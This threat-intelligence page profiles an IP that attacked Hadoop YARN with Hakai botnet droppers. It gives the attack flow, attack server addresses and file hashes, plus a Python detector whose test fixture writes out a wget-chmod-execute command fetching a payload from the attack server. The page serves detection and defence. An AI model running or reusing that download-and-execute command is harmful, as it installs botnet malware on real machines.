IP Address: 104.248.61.100 (Previously Malicious)


This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

HadoopYARN

Tags

HTTP, HadoopYARN, Malicious File, IDS - Web Application Attack, Outgoing Connection, Download and Allow Execution, Download and Execute, Download File, Inbound HTTP Request

Associated Attack Servers

52.170.223.233, 13.81.220.89, 40.68.244.223, 52.233.181.5, 159.65.248.217, 40.68.86.94, 52.166.206.33

Basic Information

IP Address

104.248.61.100

Domain

-

ISP

Digital Ocean

Country

United States

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-11-25

Last seen in Guardicore Centra

2018-12-16


Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: 159.65.248.217:80 14 times

Outgoing Connection

The file /tmp/bins.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/mysql.sock.lock was downloaded and granted execution privileges

The file /tmp/hakai.mips was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.mips was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

IDS detected Web Application Attack: 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

The file /tmp/hakai.mpsl was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.mpsl was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.sh4 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.sh4 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.x86 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.x86 was identified as malicious by YARA according to rules: Maldoc Somerules and 000 Common Rules

Malicious File

The file /tmp/hakai.arm6 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm6 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.x86_64 was downloaded and executed 11 times

Download and Execute

Process /tmp/hakai.x86_64 generated outgoing network traffic to: 159.65.248.217:1991

Outgoing Connection

The file /tmp/hakai.ppc was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.ppc was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.m68k was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.m68k was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.arm4 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm4 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.arm5 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm5 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.arm7 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm7 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.dbg was downloaded and executed 9 times

Download and Execute

Connection was closed due to timeout

/tmp/hakai.dbg was identified as malicious by YARA according to rules: Malw Miscelanea Linux, Suspicious Strings and 000 Common Rules

Malicious File

/tmp/hakai.x86_64 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File
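The attack flow above is, in effect, a detection recipe: an inbound POST carrying a wget command, wget writing into /tmp, chmod granting execution, the dropped file executing, and finally an outbound connection from that binary to the attack server. The following Python is an added example, not Guardicore Centra's code or output, that applies exactly that chain logic plus the SHA256 indicators listed on this page to constructed host telemetry in a hypothetical event schema. The wget/curl body regex is a rough stand-in for the "POST with wget in body" condition of the IDS rule named above, not the actual 401TRG signature.

```python
"""Reconstruct the download -> chmod -> execute -> connect-out dropper chain from host telemetry.

Added example; the event schema is hypothetical, not Guardicore Centra's format.
"""
import re

# Indicators copied from this page: attack server and dropped-file hashes.
ATTACK_SERVERS = {"159.65.248.217"}
KNOWN_BAD_SHA256 = {
    "46177b02fa444885e9f9ca29666d7a8291223b0b2a598784475a4d136b6f40ca": "/tmp/bins.sh",
    "34f0f32609b7a8d877defd278fea25e255a5ed8394452afdbb1d10b8a43fb297": "/tmp/hakai.x86_64",
    "2a26648922948b3048af91e3d2c508e91775a94185a60cc5f3b6a5f2f8e3ded2": "/tmp/hakai.dbg",
}
# Assumption: only these processes count as "downloaders" when they write into /tmp.
DOWNLOADERS = {"/usr/bin/wget", "/usr/bin/curl"}
# Rough stand-in for the IDS rule's "POST with wget in body" check, not the 401TRG signature.
DOWNLOADER_IN_BODY = re.compile(r"\b(wget|curl)\s+\S+", re.IGNORECASE)

# Constructed telemetry (hypothetical schema): the chain from the page plus two benign events.
EVENTS = [
    {"t": 1, "type": "http_request", "method": "POST", "src": "104.248.61.100",
     "body": "cd /tmp; wget http://159.65.248.217/bins.sh; chmod +x bins.sh; sh bins.sh"},
    {"t": 2, "type": "connect", "proc": "/usr/bin/wget", "dst": "159.65.248.217", "dport": 80},
    {"t": 3, "type": "file_write", "proc": "/usr/bin/wget", "path": "/tmp/bins.sh"},
    {"t": 4, "type": "chmod", "path": "/tmp/bins.sh", "mode": "0755"},
    {"t": 5, "type": "exec", "path": "/tmp/bins.sh",
     "sha256": "46177b02fa444885e9f9ca29666d7a8291223b0b2a598784475a4d136b6f40ca"},
    {"t": 6, "type": "file_write", "proc": "/usr/bin/wget", "path": "/tmp/hakai.x86_64"},
    {"t": 7, "type": "chmod", "path": "/tmp/hakai.x86_64", "mode": "0755"},
    {"t": 8, "type": "exec", "path": "/tmp/hakai.x86_64",
     "sha256": "34f0f32609b7a8d877defd278fea25e255a5ed8394452afdbb1d10b8a43fb297"},
    {"t": 9, "type": "connect", "proc": "/tmp/hakai.x86_64", "dst": "159.65.248.217", "dport": 1991},
    # Benign noise: a package manager writing to /tmp, and an admin curl to an unrelated host.
    {"t": 10, "type": "file_write", "proc": "/usr/bin/apt-get", "path": "/tmp/apt.lock"},
    {"t": 11, "type": "connect", "proc": "/usr/bin/curl", "dst": "93.184.216.34", "dport": 443},
]


def analyze(events):
    """Return (label, detail) findings in time order.

    State is tracked per /tmp path: a downloader write makes it 'downloaded', a chmod
    with any execute bit makes it 'executable', and only then do exec/connect events fire.
    """
    findings = []
    downloaded = set()   # /tmp paths written by a downloader process
    executable = set()   # downloaded paths later granted execute permission
    for e in sorted(events, key=lambda ev: ev["t"]):
        kind = e["type"]
        if kind == "http_request":
            if e["method"] == "POST" and DOWNLOADER_IN_BODY.search(e.get("body", "")):
                findings.append(("inbound_post_with_downloader", e["src"]))
        elif kind == "file_write":
            if e["proc"] in DOWNLOADERS and e["path"].startswith("/tmp/"):
                downloaded.add(e["path"])
        elif kind == "chmod":
            if e["path"] in downloaded and int(e["mode"], 8) & 0o111:
                executable.add(e["path"])
                findings.append(("download_and_allow_execution", e["path"]))
        elif kind == "exec":
            if e["path"] in executable:
                findings.append(("download_and_execute", e["path"]))
            if e.get("sha256") in KNOWN_BAD_SHA256:
                findings.append(("known_malicious_hash", e["path"]))
        elif kind == "connect":
            dest = f'{e["dst"]}:{e["dport"]}'
            if e["proc"] in executable:
                findings.append(("dropped_binary_outbound", f'{e["proc"]} -> {dest}'))
            elif e["dst"] in ATTACK_SERVERS:
                findings.append(("connection_to_attack_server", f'{e["proc"]} -> {dest}'))
    return findings


if __name__ == "__main__":
    for label, detail in analyze(EVENTS):
        print(f"{label:32} {detail}")
```

Running it prints nine findings, one per stage of the chain; the two benign events produce nothing because an execution or outbound connection is only flagged for a path that was first written by a downloader and then made executable. The hash check is deliberately independent of the chain, so a known-bad binary is still reported when the agent missed the earlier stages. The page itself records repeated stages for the same file (hakai.x86_64 was executed 11 times), so in practice findings should be de-duplicated per path before alerting.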

Associated Files

/tmp/bins.sh

SHA256: 46177b02fa444885e9f9ca29666d7a8291223b0b2a598784475a4d136b6f40ca

1918 bytes

/tmp/hakai.mips

SHA256: 187b7d7c43f998ab939bcedf6d7fcd27ca648d28389e300b018f4991a61d59e8

75704 bytes

/tmp/hakai.mpsl

SHA256: b53e2e6ea09ac8d1bf0a21751320a2480eaf2703ab27358447d8cf9cfcf1b503

76072 bytes

/tmp/hakai.sh4

SHA256: 66c8676eb8c7c11dad14a45ea8a7b70aece9a1ebd7252888dd07fd8192989814

60696 bytes

/tmp/hakai.x86

SHA256: f35bee6545e9afe4be8c0bc1076c728e977881e03e08d74c5b04c137eee14c1e

56924 bytes

/tmp/hakai.arm6

SHA256: 181484a7800111412181deccf0d71d758d7ea176d5e6824ddeb5943cc551eca5

60860 bytes

/tmp/hakai.x86_64

SHA256: 34f0f32609b7a8d877defd278fea25e255a5ed8394452afdbb1d10b8a43fb297

151403 bytes

/tmp/hakai.ppc

SHA256: 51124c5b5dba00c5508b5684751e619ce3dc53099bcecc08d318ce465d751e5d

58748 bytes

/tmp/hakai.m68k

SHA256: fe47630f6217cb40e750740e0c1501f30359e6e2b7181e3ddc36fc0a8a173114

56212 bytes

/tmp/hakai.arm4

SHA256: b6e31cabb88e4eabcc8168e32438963698dc56d1f26acc018a22b70806ee0db0

62892 bytes

/tmp/hakai.arm5

SHA256: 9d7d967c30a88eabb0af97ac3a477ab281c656cf91ce9b1a8d14233b7355a830

62952 bytes

/tmp/hakai.arm7

SHA256: 32cc7661ba3a440d3668f8cd498296e9d06acbb8c713559fda9e40a3047c105a

60860 bytes

/tmp/hakai.dbg

SHA256: 2a26648922948b3048af91e3d2c508e91775a94185a60cc5f3b6a5f2f8e3ded2

1019921 bytes

